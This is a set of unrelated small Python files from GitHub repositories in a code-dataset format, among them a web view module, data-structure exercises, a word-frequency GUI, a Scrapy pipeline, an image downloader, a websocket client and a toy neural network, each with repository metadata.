\")\n\n\n###############################################################################\n# Image viewers\n###############################################################################\n\nAUTHORIZED_IMAGE_EXT = [\".nii\", \".nii.gz\"]\n\n\nclass PIWSImageViewers(component.CtxComponent):\n \"\"\" Display a box containing links to image viewers.\n \"\"\"\n __regid__ = \"image_viewers\"\n context = \"left\"\n title = _(\"Image viewers\")\n order = 1\n __select__ = is_instance(\"Scan\") & one_line_rset\n\n def render_body(self, w, **kwargs):\n \"\"\" Method to create the image box content.\n \"\"\"\n # 3D image viewer\n scan = self.cw_rset.get_entity(0, 0)\n if len(scan.filesets) > 0:\n efentries = scan.filesets[0].external_files\n else:\n efentries = []\n imagefiles = [e.filepath for e in efentries\n if e.filepath.endswith(tuple(AUTHORIZED_IMAGE_EXT))]\n limagefiles = len(imagefiles)\n if limagefiles > 0:\n w(u'
')\n w(u'
')\n href = self._cw.build_url(\n \"view\", vid=\"brainbrowser-image-viewer\", imagefiles=imagefiles,\n __message=(u\"Found '{0}' image(s) that can be \"\n \"displayed.\".format(limagefiles)))\n w(u''.format(\n href))\n w(u'Triplanar')\n w(u'

')\n\n\n###############################################################################\n# Add a box to display entity relations\n###############################################################################\n\nclass RelationBox(component.CtxComponent):\n \"\"\" Helper view class to display a relation rset in a sidebox.\n \"\"\"\n __select__ = nonempty_rset() & match_kwargs(\"title\", \"rql\")\n __regid__ = \"relationbox\"\n cw_property_defs = {}\n context = \"incontext\"\n\n @property\n def domid(self):\n return (super(RelationBox, self).domid + unicode(abs(id(self))) +\n unicode(abs(id(self.cw_rset))))\n\n def render_title(self, w):\n w(self.cw_extra_kwargs[\"title\"])\n\n def render_body(self, w):\n defaultlimit = self._cw.property_value(\"navigation.related-limit\")\n if not isinstance(self.cw_rset, list):\n rset = list(self.cw_rset.entities())\n else:\n rset = self.cw_rset\n for entity in rset[:(defaultlimit - 1)]:\n w(u\"
• \" + entity.view(self.context) + u\"
\")\n # if len(rset) == defaultlimit:\n rql = self.cw_extra_kwargs[\"rql\"]\n href = self._cw.build_url(rql=rql)\n w(u\"
\".format(href))\n\n\n###############################################################################\n# Change logo\n###############################################################################\n\n@monkeypatch(ApplLogo)\ndef render(self, w):\n w(u'' % (\n self._cw.base_url(),\n self._cw.data_url(self._cw.vreg.config.get(\"logo\"))))\n\n\n###############################################################################\n# Change footer\n###############################################################################\n\nclass FooterView(EntityView):\n \"\"\" Footer content when an entity is displayed\"\"\"\n __regid__ = \"metadata\"\n show_eid = True\n\n def cell_call(self, row, col):\n _ = self._cw._\n entity = self.cw_rset.get_entity(row, col)\n self.w(u\"

\")\n if self.show_eid:\n self.w(u\"{0} #{1} - \".format(entity.dc_type(), entity.eid))\n if entity.creation_date:\n self.w(u\"created on \")\n self.w(u\"{0}\".format(\n self._cw.format_date(entity.creation_date)))\n self.w(u\"

\")\n\n\n###############################################################################\n# Registry\n###############################################################################\n\ndef registration_callback(vreg):\n vreg.register_and_replace(\n PIWSAuthenticatedUserStatus, BSAuthenticatedUserStatus)\n vreg.register(RelationBox)\n vreg.register(TimeLeft)\n vreg.register(PIWSNavigationtBox)\n vreg.register(PIWSSubjectStatistics)\n vreg.register(PIWSAssessmentStatistics)\n vreg.register(PIWSImageViewers)\n vreg.register(PIWSSummary)\n vreg.unregister(EditBox)\n vreg.unregister(BreadCrumbEntityVComponent)\n vreg.unregister(BreadCrumbAnyRSetVComponent)\n vreg.unregister(BreadCrumbETypeVComponent)\n vreg.unregister(BreadCrumbLinkToVComponent)\n vreg.unregister(AnonUserStatusLink)\n vreg.register_and_replace(FooterView, MetaDataView)\n config = load_forms(vreg.config)\n if not isinstance(config, dict):\n vreg.unregister(CWUploadBox)\n","repo_name":"neurospin/piws","sub_path":"piws/views/components.py","file_name":"components.py","file_ext":"py","file_size_in_byte":29016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71514808584","text":"class SLnode:\n def __init__(self, val) -> None:\n self.value = val\n self.next = None\n\nclass SList:\n def __init__(self) -> None:\n self.head = None\n \n def add_to_front(self, val):\n new_node = SLnode(val)\n new_node.next = self.head\n self.head = new_node\n return self\n \n def print_values(self):\n runner = self.head\n while runner != None:\n print(runner.value)\n runner = runner.next\n return self\n\n def add_to_back(self, val):\n if self.head == None:\n self.add_to_front(val)\n return self\n new_node = SLnode(val)\n runner = self.head\n while runner.next != None:\n runner = runner.next\n runner.next = new_node\n return self\n\n def remove_from_front(self):\n if self.head == None:\n return self\n self.head = self.head.next\n return self\n \n def remove_from_back(self):\n if self.head == None:\n return self\n runner = self.head\n runner2 = runner.next\n while runner2.next != None:\n runner2 = runner2.next\n runner = runner.next\n runner.next = None\n return self\n\n def remove_val(self, val):\n if self.head.value == val:\n self.remove_from_front()\n return self\n runner = self.head\n runner2 = runner.next\n while runner2.value != val and runner2.next != None:\n runner2 = runner2.next\n runner = runner.next\n if runner2.value == val:\n runner.next = runner2.next\n else:\n print(f\"Value {val} is not in list.\")\n return self\n \n def insert_at(self, val, n):\n if n == 0:\n self.add_to_front(val)\n return self\n new_node = SLnode(val)\n runner = self.head\n runner2 = runner.next\n m = 1\n while runner2.next != None and m != n:\n runner = runner.next\n runner2 = runner2.next\n m += 1\n if m == n:\n runner.next = new_node\n new_node.next = runner2\n elif m < n:\n runner2.next = new_node\n return self\n\n\n\nmy_list = SList()\nmy_list.add_to_front(2).add_to_front(1).add_to_back(3).print_values() \n# my_list.remove_from_front().print_values() \n# my_list.remove_from_back().print_values() \n# my_list.remove_val(12).print_values()\nmy_list.insert_at(20,3).print_values()","repo_name":"zhanliu324/Coding-Dojo","sub_path":"2.python/fundamentals/extras/singly_linked_list.py","file_name":"singly_linked_list.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"27859449948","text":"import csv\nimport requests\nfrom PyQt5 import QtCore, QtWidgets\nfrom gui import Ui_Form\nimport os\nimport globals\nimport textract\nfrom urllib.parse import urlparse\nimport MeCab\nfrom collections import Counter\nfrom nltk import word_tokenize\nimport re\n\nhome = os.path.dirname(__file__)\n\nclass Worker(QtWidgets.QDialog):\n\n def __init__(self, files, *args):\n super().__init__()\n self.files = files\n self.resize(345, 70)\n self.progressBar = QtWidgets.QProgressBar(self)\n self.progressBar.setGeometry(QtCore.QRect(10, 20, 321, 23))\n self.progressBar.setWindowTitle(\"Adding...\")\n self.progressBar.setMinimum(0)\n self.progressBar.setMaximum(0)\n\n self.freqthread = Files(self.files, *args)\n self.freqthread.start()\n self.freqthread.done.connect(lambda: self.close())\n\n self.show()\n\nclass Files(QtCore.QThread):\n done = QtCore.pyqtSignal(bool)\n\n def __init__(self, files, out, type, addoccur):\n super().__init__()\n self.files = files\n self.words = []\n self.type = type\n self.out = out\n self.addoccur = addoccur\n\n def run(self):\n for file in self.files:\n self.words += file.tokenize()\n self.gen_freq()\n self.done.emit(True)\n\n def gen_freq(self):\n freqTitle = os.path.basename(self.files[0].filepath)[\n :-4] + \"_Frequency_List\" + self.type\n counter = Counter(self.words)\n trashre = re.compile(\n r\"^['\\\"{}!(:/.\\\\0-9%^&*@#$_\\-~`|+•『』〔〕��]\\[\\]{}⦅⦆〈〉。、>< ,・=;※ー【】〖〗〘〙)a-zA-Z]{0,2}$\")\n mc = counter.most_common()\n mc = {k: v for k, v in mc if not bool(re.findall(trashre, k))}\n freqinfo = [k for k, _ in mc.items()]\n with open(os.path.join(self.out, freqTitle), \"w\", encoding=\"utf8\") as freq:\n if self.type == \".csv\":\n obj = csv.writer(freq)\n for _, row in enumerate(freqinfo):\n if self.addoccur:\n obj.writerow([row, counter[row]])\n else:\n obj.writerow([row, \"\"])\n else:\n if self.addoccur:\n freq.write('\\n'.join(['\\t'.join([k, str(v)])\n for k, v in counter.most_common()]))\n else:\n freq.write('\\n'.join(freqinfo))\n\n\nclass File(QtCore.QThread):\n\n def __init__(self, filepath, lang):\n super().__init__()\n self.filepath = filepath\n self.lang = lang\n self.isweb = self.check_web()\n\n if self.lang == \"japanese\":\n self.wakati = MeCab.Tagger(\"-Owakati\")\n\n def extract_text(self):\n if self.isweb:\n with open(os.path.join(home, \"temp.html\"), \"wb\") as f:\n f.write(requests.get(self.filepath).content)\n self.filepath = os.path.join(home, \"temp.html\")\n\n text = textract.process(self.filepath, encoding=\"utf-8\")\n if self.isweb:\n os.remove(os.path.join(home, \"temp.html\"))\n return text.decode('utf-8')\n\n def check_web(self):\n try:\n _ = requests.get(self.filepath)\n except:\n return False\n else:\n return True\n\n def tokenize(self):\n if self.lang != \"japanese\":\n tokenized = word_tokenize(self.extract_text())\n else:\n tokenized = self.wakati.parse(self.extract_text()).split()\n return tokenized\n\n\nclass MainWindow(Ui_Form):\n\n def __init__(self):\n super().__init__()\n\n def setupUi(self):\n self.choosedirbutton.clicked.connect(self.choosedir)\n self.generate.clicked.connect(\n lambda: self.genfreq(self.filetype.currentText()))\n self.remove.clicked.connect(self.deleteItem)\n self.clear.clicked.connect(self.clearList)\n self.lang.addItems(globals.supportedlangs)\n\n def choosedir(self):\n self.dir = str(QtWidgets.QFileDialog.getExistingDirectory(\n self, \"Output Folder\"))\n self.outpath.setText(self.dir)\n\n def genfreq(self, filetype):\n files = [str(self.filewidget.item(i).text())\n for i in range(self.filewidget.count())] + [self.url.text()]\n if len(files) == 1 and not files[0]:\n self.error(\"No files have been selected\")\n return\n if not os.path.exists(self.outpath.text()):\n self.error(\"Choose an output directory first\")\n return\n\n files = [File(filename, self.lang.currentText())\n for filename in files if filename]\n worker = Worker(files, self.dir, filetype.currentText(), self.addoccur.isChecked())\n\n def error(self, text, title=\"Error has occured\"):\n dialog = QtWidgets.QMessageBox()\n dialog.setWindowTitle(title)\n dialog.setText(text)\n dialog.setIcon(QtWidgets.QMessageBox.Warning)\n dialog.exec_()\n\n def deleteItem(self):\n listItems = self.filewidget.selectedItems()\n if not listItems:\n self.filewidget.setCurrentItem(self.filewidget.item(0))\n if self.filewidget.count() > 0:\n self.deleteItem()\n\n for item in listItems:\n self.filewidget.takeItem(self.filewidget.row(item))\n\n def clearList(self):\n self.filewidget.setCurrentItem(self.filewidget.item(0))\n for _ in range(self.filewidget.count()):\n self.filewidget.clear()\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n screen = MainWindow()\n screen.setupUi()\n screen.show()\n sys.exit(app.exec_())\n","repo_name":"kamui-fin/freq-gen","sub_path":"src/freq.py","file_name":"freq.py","file_ext":"py","file_size_in_byte":5662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1787711538","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\nfrom xiaoshuo.items import XiaoshuoJobItem\nfrom pymongo import MongoClient\nimport pymysql\nclass MuluPipeline(object):\n def process_item(self, item, spider):\n print(item,'+++++++++++++')\n return item\n\nclass XiaoSqlPipeline(object):\n def open_spider(self,spider):\n '''\n 爬虫启动时出发该函数,spider为触发pipeline的爬虫实例\n '''\n self.__conn = pymysql.connect(\n host='127.0.0.1',\n port=3306,\n db='xiaoshuo1',\n user='root',\n passwd='root',\n charset='utf8')\n self.cu=self.__conn.cursor(pymysql.cursors.DictCursor)\n\n # self.m=MongoClient()#连接数据库\n # self.db=self.m.xiaoshuo#进入数据库\n # self.col=self.db[spider.name]#获取数据库\n def process_item(self,item,spider):\n '''\n 当爬虫刨除一个item实例是触发该函数向该方法传入触发的item实例及爬虫实例\n '''\n #当传入的item为XiaoshuoJobItem类型时将其转换为字典存入MongoDB\n # if isinstance(item,XiaoshuoJobItem):\n # self.col.insert_one(dict(item))\n # #将item返回以带后继的pipeline进行处理\n # return item\n if isinstance(item, XiaoshuoJobItem):\n #查询分类\n sql = 'select * from book where name=%s'\n flag = self.cu.execute(sql,(item['name'],))\n if flag:\n tid=self.cu.fetchone()\n else:\n sql='insert into book(name,cation,size,progress,upload,update,image_urls)values(%s,%s,%s,%s,%s,%s,%s)'\n self.cu.execute(sql,(item['name'],item['cation'],item['size'],item['progress'],item['upload'],item['update'],item['image_urls']))\n self.__conn.commit()\n tid=self.cu.lastrowid\n return item\n\ndef close_spider(self,spider):\n '''\n 当爬虫关闭时触发该方法,一般可以用来数据库的断开操作\n '''\n self.m.close()\n","repo_name":"xuruigang/spiderproject","sub_path":"spiderproject/xiaoshuo/build/lib/xiaoshuo/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17645379777","text":"# @, %, #을 사용한다. @는 3을 곱하고, %는 5를 더하며, #는 7을 빼는 연산자\n# 3\n# 3 @ %\n# 10.4 # % @\n# 8 #\n\nt = int(input())\n\nans = list()\n\nfor i in range(t) :\n li = list(input().split())\n num = float(li.pop(0))\n\n for j in range(len(li)): \n if li[j] == '@' :\n num *= 3\n elif li[j] == '%':\n num += 5\n elif li[j] == '#':\n num -= 7\n\n ans.append(\"{:0.2f}\".format(num))\n\nfor i in range(len(ans)):\n print(ans[i])\n\n \n \n\n ","repo_name":"Techeer-3rd-gen-study/Algorithm-study","sub_path":"01주차_10.7_10.12/3_5355/정길연_5355.py","file_name":"정길연_5355.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"ko","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"16157062024","text":"\"\"\"\nCSE101: Introduction to Programming\nAssignment 3\n\nName :Vaibhav Gupta\nRoll-no :2019341\n\"\"\"\n\n\n\nimport math as m\nimport random\n\n\n\ndef dist(p1, p2):\n \"\"\"\n Find the euclidean distance between two 2-D points\n\n Args:\n p1: (p1_x, p1_y)\n p2: (p2_x, p2_y)\n \n Returns:\n Euclidean distance between p1 and p2\n \"\"\"\n return m.sqrt(m.pow(p1[0] - p2[0],2) + m.pow(p1[1] - p2[1],2))\n\n\n\ndef sort_points_by_X(points):\n \"\"\"\n Sort a list of points by their X coordinate\n\n Args:\n points: List of points [(p1_x, p1_y), (p2_x, p2_y), ...]\n \n Returns:\n List of points sorted by X coordinate\n \"\"\"\n return sorted(points,key=lambda x:x[0])\n\n\n\ndef sort_points_by_Y(points):\n \"\"\"\n Sort a list of points by their Y coordinate\n\n Args:\n points: List of points [(p1_x, p1_y), (p2_x, p2_y), ...]\n \n Returns:\n List of points sorted by Y coordinate \n \"\"\"\n return sorted(points,key=lambda x:x[1])\n\n\n\ndef naive_closest_pair(plane):\n \"\"\"\n Find the closest pair of points in the plane using the brute\n force approach\n\n Args:\n plane: List of points [(p1_x, p1_y), (p2_x, p2_y), ...]\n\n Returns:\n Distance between closest pair of points and closest pair \n of points: [dist_bw_p1_p2, (p1_x, p1_y), (p2_x, p2_y)]\n \"\"\"\n l=[]\n\n for i in range(len(plane)-1):\n for j in range(i+1,len(plane)):\n l.append([dist(plane[i],plane[j]),plane[i],plane[j]])\n\n a=sorted(l,key=lambda x:x[0])\n\n return a[0]\n\n\n\ndef closest_pair_in_strip(points, d):\n \"\"\"\n Find the closest pair of points in the given strip with a \n given upper bound. This function is called by \n efficient_closest_pair_routine\n\n Args:\n points: List of points in the strip of interest.\n d: Minimum distance already found found by \n efficient_closest_pair_routine\n\n Returns:\n Distance between closest pair of points and closest pair \n of points: [dist_bw_p1_p2, (p1_x, p1_y), (p2_x, p2_y)] if\n distance between p1 and p2 is less than d. Otherwise\n return -1.\n \"\"\"\n if len(points)>=2:\n\n s=[]\n p=sort_points_by_Y(points)\n\n for i in range(len(p)-1):\n for j in range(i+1,len(p)):\n s.append([dist(p[i],p[j]),p[i],p[j]])\n\n a = sorted(s, key=lambda x: x[0])\n\n if a[0][0] 1:\n # file = tokens[1]\n # else:\n # file = 'null'\n # print(tokens[4], tokens[5])\n # print(folder, file)\n return 'images/' + folder + '.' + file\n\n\ndef make_folder(folder):\n if not os.path.exists(folder):\n os.mkdir(folder)\n return\n\ndef process_url(url):\n file = parse_url(url).lower()\n if file[-1] == '.':\n file = file + 'jpg'\n\n # make_folder(folder)\n\n if not os.path.isfile(file):\n with open(file, 'wb') as f:\n resp = requests.get(url, verify=False)\n f.write(resp.content)\n f.close()\n\nwith open('birds-to-words-v1.0.tsv') as tsvfile:\n reader = csv.reader(tsvfile, delimiter='\\t')\n # i = 0\n data = []\n for i, row in enumerate(reader):\n # i += 1\n if i == 0:\n continue\n process_url(row[1])\n process_url(row[5])\n # print(i)\n # if i == 10:\n # break\n","repo_name":"XiaoxiaoGuo/fashion-iq","sub_path":"transformer/user_modeling/download_image.py","file_name":"download_image.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":126,"dataset":"github-code","pt":"78"} +{"seq_id":"43173455699","text":"'''\nCreated on Aug 17, 2019\n\n@author: k_sato\n'''\nimport pprint\nimport socket\nimport websocket\nfrom bs4 import BeautifulSoup\nfrom threading import Thread\nimport time\nimport requests\nfrom utils.logger import Logger\n# import sys\n\nclass WsClient:\n # 初期化\n def __init__(self, server_info):\n self.logger = Logger()\n self.logger.log(['WsClient', 'init', 'START'])\n # 接続先情報受け取り\n self.server_info = server_info\n # 通常ソケットの生成\n self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # セッション生成\n self.session = requests.session()\n\n def start_chat(self):\n print(\"WsClient.start_chat\")\n self.logger.log(['WsClient', 'start_chat', 'START'])\n # Websocket用意\n ws_url = \"ws://\" + self.server_info['server_name'] + \":\" + str(self.server_info['ws_port']) + self.server_info['websocket_path']\n self.logger.log(['WsClient', 'start_chat', 'ws_url' + ws_url])\n self.ws = websocket.WebSocketApp(ws_url,\n on_message=self.on_message,\n on_error=self.on_error,\n on_close=self.on_close)\n # 通信ポーリング\n self.ws.on_open = self.on_open\n self.ws.run_forever()\n self.logger.log(['WsClient', 'start_chat', 'End'])\n\n # メッセージ受信\n def on_message(self, message):\n self.logger.log(['WsClient', 'on_message', 'START'])\n print(self.ws)\n print(message)\n\n \"\"\"\n エラーハンドリング\n @param error\n @return: none\n \"\"\"\n def on_error(self, error):\n self.logger.log(['WsClient', 'on_error', 'START'])\n print(\"WsClient.on_error\")\n print(self.ws)\n print(error)\n\n \"\"\"\n Websocketのクローズ\n @param none\n @return: none\n \"\"\"\n def on_close(self):\n print(\"WsClient.on_close\")\n print(self.ws)\n print(\"### closed ###\")\n\n \"\"\"\n 通信ポーリング\n @param none\n @return: none\n \"\"\"\n def on_open(self):\n self.logger.log(['WsClient', 'on_open', 'START'])\n print(\"Thread call run\")\n Thread(target=self.run).start()\n\n \"\"\"\n クライアント\n @param none\n @return: none\n \"\"\"\n def run(self):\n self.logger.log(['WsClient', 'run', 'START'])\n print(self.ws)\n for i in range(3):\n print(\"ws send...\")\n self.ws.send(\"Hello %d\" % i)\n print(\"Hello %d\" % i)\n print(\"time sleep...\")\n time.sleep(1)\n\n time.sleep(1)\n self.ws.close()\n self.logger.log(['WsClient', 'run', 'Thread terminating...'])\n\n \"\"\"\n 認証処理\n @param none\n @return: none\n \"\"\"\n def auth_user(self):\n self.logger.log(['WsClient', 'auth_user', 'START'])\n url = self.server_info['protcol'] + '://' + self.server_info['server_name'] + self.server_info['sign_in_url']\n self.logger.log(['WsClient', 'auth_user', 'sign_in_url' + url])\n try:\n response = self.session.get(url)\n self.logger.log(['WsClient', 'run', 'status_code:' + str(response.status_code)])\n # BeautifulSoupオブジェクト作成(token取得の為)\n bs = BeautifulSoup(response.text, 'html.parser')\n login_data = {\n 'UTF-8': '✓',\n 'email': self.server_info['user_name'],\n 'password': self.server_info['password'],\n }\n\n # tokenの取得\n self.authenticity_token = bs.find(attrs={'name':'authenticity_token'}).get('value')\n\n # 取得したtokenをpostするパラメータに追加\n login_data['authenticity_token'] = self.authenticity_token\n\n # ログインAPI実行\n url = self.server_info['protcol'] + '://' + self.server_info['server_name'] + self.server_info['api_sign_in_url']\n self.logger.log(['WsClient', 'auth_user', 'api_sign_in_url' + url])\n\n # 実行結果\n self.login_data = self.session.post(url, data=login_data)\n self.logger.log(['WsClient', 'auth_user', 'sign_in_url' + url])\n self.logger.log(['WsClient', 'auth_user', \"----WsClient.auth_user session----\"])\n self.logger.log(['WsClient', 'auth_user', \"server_name:\"+self.server_info['server_name'] ,'session:' + str(pprint.pprint(self.session))])\n self.status = 'able'\n except requests.exceptions.RequestException:\n self.status = 'eable'\n def get_lounges(self):\n self.logger.log(['WsClient', 'get_lounges', \"START\"])\n url = self.server_info['protcol'] + '://' + self.server_info['server_name'] + self.server_info['lounges'] + \".json\"\n self.logger.log(['WsClient', 'get_lounges', \"url\"+url])\n try:\n response = self.session.get(url)\n self.logger.log(['WsClient', 'get_lounges', 'sign_in_url' + url])\n self.logger.log(['WsClient', 'get_lounges', \"response.text\"+response.text])\n return response\n except requests.exceptions.RequestException:\n self.logger.log(['WsClient', 'get_lounges', 'Can not get lounges' ])\n\n def remark(self, content, lounge_id):\n self.logger.log(['WsClient', 'remark', 'Start' ])\n subscribre_data = {\n 'UTF-8': '✓',\n 'user_id': self.login_data['user_id'],\n 'lounge_id': lounge_id,\n 'content': content,\n 'last_posted_at': self.login_data['last_posted_at'],\n 'authenticity_token': self.authenticity_token\n }\n ws_url = \"ws://\" + self.server_info['server_name'] + \":\" + str(self.server_info['ws_port']) + self.server_info['websocket_path']\n self.data = self.session.post(ws_url, data=subscribre_data)\n self.logger.log(['WsClient', 'remark', 'data geted' ])\n self.logger.log(['WsClient', 'remark', 'data' + self.data ])\n\n\n\n","repo_name":"satokadumasa/BambooClientPy","sub_path":"net/wsclient.py","file_name":"wsclient.py","file_ext":"py","file_size_in_byte":5996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25532527166","text":"import numpy as np\nimport sklearn.datasets\nfrom matplotlib import pyplot as plt\n\n\nX, y = sklearn.datasets.make_moons(200, noise=0.2)\n\nfig = plt.figure()\nax = fig.gca()\nax.scatter(X[:,0], X[:,1], s=40, c=y, cmap=plt.cm.Spectral)\nax.set_xticks([])\nax.set_yticks([])\nplt.savefig('data_scatter.png')\n\nnn_hdim = 3\nnum_examples = len(X)\nnn_input_dim = 2\nnn_output_dim = 2\nnn_nlayer = 1\n\ndef softmax(xlist):\n \"\"\"\n \"\"\"\n\n res = [np.exp(x) for x in xlist]\n\n res /= np.sum(res,axis=1, keepdims=True)\n return res\n\n \ndef calculateLoss(model):\n \"\"\"\n \"\"\"\n\n W1 = model[0]\n b1 = model[1]\n W2 = model[2]\n b2 = model[3] \n\n\n z1 = X.dot(W1) + b1\n a1 = np.tanh(z1)\n z2 = a1.dot(W2) + b2\n a2 = softmax(z2)\n\n\n # print('z1.shape = %s' %(z1.shape,))\n # print('a1.shape = %s' %(a1.shape,))\n\n correct_logprobs = -np.log(a2[range(num_examples),y])\n data_loss = np.sum(correct_logprobs)\n return data_loss/num_examples\n\ndef getGradient(model,X,yhat,y,z):\n \"\"\"\n\n \"\"\"\n N = num_examples\n W = model[0]\n b = model[1]\n\n dLdb = [None]*nn_nlayer\n dLdW = [None]*nn_nlayer\n \n dLdb[-1] = [(yhat-y)/N]\n dLdW[-1] = [z[-1]*dLdb]\n\n i = nn_nlayer\n while i > 1:\n i -= 1\n dLdb[i] = dLdb[i+1].dot(np.transpose(W[i+1])) * (1-z[i]*z[i])\n if i != 1:\n dLdW[i] = np.outer(z[i-1],dLdb[i])\n else:\n dLdW[i] = np.outer(X,dLdb[i])\n \n return [dLdW,dLdb]\n\ndef predict(model,x):\n \"\"\"\n \"\"\"\n W1 = model[0]\n b1 = model[1]\n W2 = model[2]\n b2 = model[3]\n\n print('Ndata = %i' %(num_examples))\n print('Nnodes = %i' %(nn_hdim))\n print('din = %i' %(nn_input_dim))\n print('dout = %i' %(nn_output_dim)) \n \n print('x.shape = %s' %(x.shape,))\n print('W1.shape = %s' %(W1.shape,))\n print('b1.shape = %s' %(b1.shape,))\n print('W2.shape = %s' %(W2.shape,))\n print('b2.shape = %s' %(b2.shape,))\n\n z1 = x.dot(W1) + b1\n a1 = np.tanh(z1)\n z2 = a1.dot(W2) + b2\n a2 = softmax(z2)\n\n\n print('z1.shape = %s' %(z1.shape,))\n print('a1.shape = %s' %(a1.shape,))\n print('z2.shape = %s' %(z2.shape,))\n print('a2.shape = %s' %(a2.shape,))\n return np.argmax(a2,axis=1)\n \ndef plotDecisionBoundary(model):\n \"\"\"\n\n \"\"\"\n W1 = model[0]\n b1 = model[1]\n W2 = model[2]\n b2 = model[3]\n\n # Create mesh grid\n\n xmin = min(X[:,0])-0.5\n xmax = max(X[:,0])+0.5\n ymin = min(X[:,1])-0.5\n ymax = max(X[:,1])+0.5\n\n h = 0.01\n xx,yy = np.meshgrid(np.arange(xmin,xmax,h),np.arange(ymin,ymax,h))\n\n Z = predict(model,np.c_[xx.ravel(),yy.ravel()])\n Z = Z.reshape(xx.shape)\n\n plt.contourf(xx,yy,Z,cmap = plt.cm.Spectral)\n plt.scatter(X[:,0], X[:,1], s=40, c=y, cmap=plt.cm.Spectral)\n\n\n\ndef build_model(nn_hdim,num_passes=1):\n \"\"\"\n \"\"\"\n eps = 0.01\n \n W1 = np.random.randn(nn_input_dim, nn_hdim) / np.sqrt(nn_input_dim)\n b1 = np.zeros((1, nn_hdim))\n W2 = np.random.randn(nn_hdim, nn_output_dim) / np.sqrt(nn_hdim)\n b2 = np.zeros((1, nn_output_dim))\n model = {}\n for i in range(num_passes):\n z1 = X.dot(W1) + b1\n a1 = np.tanh(z1)\n z2 = a1.dot(W2) + b2\n a2 = softmax(z2)\n\n delta3 = a2\n delta3[range(num_examples),y] -=1\n\n # print('[range(num_examples),y] = %s' %([range(num_examples),y],))\n dW2 = (a1.T).dot(delta3)\n db2 = np.sum(delta3,axis = 0,keepdims = True)\n delta2 = delta3.dot(W2.T)* (1 - np.power(a1,2))\n dW1 = np.dot(X.T,delta2)\n stop\n db1 = np.sum(delta2,axis=0)\n\n W1 += -eps*dW1\n b1 += -eps*db1 \n W2 += -eps*dW2\n b2 += -eps*db2\n # print('%.3f \\t%i' %(calculateLoss([W1,b1,W2,b2]),i))\n\n model = [W1,b1,W2,b2]\n return model\n\nmodel = build_model(3,num_passes=1000)\n\n\n# X, y = sklearn.datasets.make_moons(200, noise=0.2)\npredict(model,X)\nplotDecisionBoundary(model)\nplt.savefig('decisionBoundary.png')\n","repo_name":"HenrikLundMortensen/neuralNetworkExample","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28479806701","text":"# def add(self, item):\n# \"\"\"\n# 广度优先遍历方式添加结点\n# :param item:\n# :return:\n# \"\"\"\n# if self.root is None:\n# self.root = Node(item)\n# else:\n# queue = []\n# queue.append(self.root)\n\n# while len(queue) > 0:\n# node = queue.pop(0)\n# if not node.lchild:\n# node.lchild = Node(item)\n# return\n# else:\n# queue.append(node.lchild)\n# if not node.rchild:\n# node.rchild = Node(item)\n# return\n# else:\n# queue.append(node.rchild)\n\n# def breadh_travel(self):\n# \"\"\"广度优先遍历\"\"\"\n# if self.root is None:\n# return\n# queue = []\n# queue.append(self.root)\n# while len(queue)>0:\n# node = queue.pop(0)\n# print(node.item, end=\" \")\n# if node.lchild:\n# queue.append(node.lchild)\n# if node.rchild:\n# queue.append(node.rchild)\nclass classname(object):\n def __init__(self,data):\n self.left=None\n self.right=None\n self.data=data\n def student(self,data):\n if dataself.data:\n if self.right is None:\n self.right=data\n else:\n self.right.student(data)\ns=classname(10)\nprint(s.student(8))\n\n\n\n","repo_name":"gschen/where2go-python-test","sub_path":"1906101031王卓越/1300-蓝桥杯/year-2010/text-01.py","file_name":"text-01.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"23045780812","text":"# -*- coding: UTF-8 -*-\n# SPDX-License-Identifier: 0BSD\n\n\"\"\"Data Encoding and Hashing\"\"\"\n\nimport base64\nimport hashlib\nimport logging\n\nfrom eljef.core import fops\n\nLOGGER = logging.getLogger(__name__)\n\nBLOCK_SIZE = 65536\n\n\ndef encode_base64(path: str) -> str:\n \"\"\"Reads ``path`` and converts the data to a base64 encode string\n\n Args:\n path: Full path to file to base64 encode contents of\n\n Returns:\n Base64 encoded data as a string\n\n Raises:\n FileNotFoundError: When ``path`` does not exist\n IsADirectoryError: When ``path`` is a directory\n \"\"\"\n LOGGER.debug(\"base64 encoding data from %s\", path)\n with open(path, 'rb') as file_data:\n return fops.makestr(base64.b64encode(file_data.read()))\n\n\ndef hash_md5(path: str) -> str:\n \"\"\"Creates a MD5 hash for ``path``\n\n Args:\n path: Full path to file to create hash for.\n\n Returns:\n string form of MD5 hash\n\n Raises:\n FileNotFoundError: When ``path`` does not exist\n IsADirectoryError: When ``path`` is a directory\n \"\"\"\n LOGGER.debug(\"Generating MD5 hash for %s\", path)\n h_md5 = hashlib.md5()\n with open(path, 'rb') as hash_file:\n buf = hash_file.read(BLOCK_SIZE)\n while buf:\n h_md5.update(buf)\n buf = hash_file.read(BLOCK_SIZE)\n\n return fops.makestr(h_md5.hexdigest())\n\n\ndef hash_sha256(path: str) -> str:\n \"\"\"Creates a SHA256 hash for ``path``\n\n Args:\n path: Full path to file to create hash for.\n\n Returns:\n string form of SHA256 hash\n\n Raises:\n FileNotFoundError: When ``path`` does not exist\n IsADirectoryError: When ``path`` is a directory\n \"\"\"\n LOGGER.debug(\"Generating SHA256 hash for %s\", 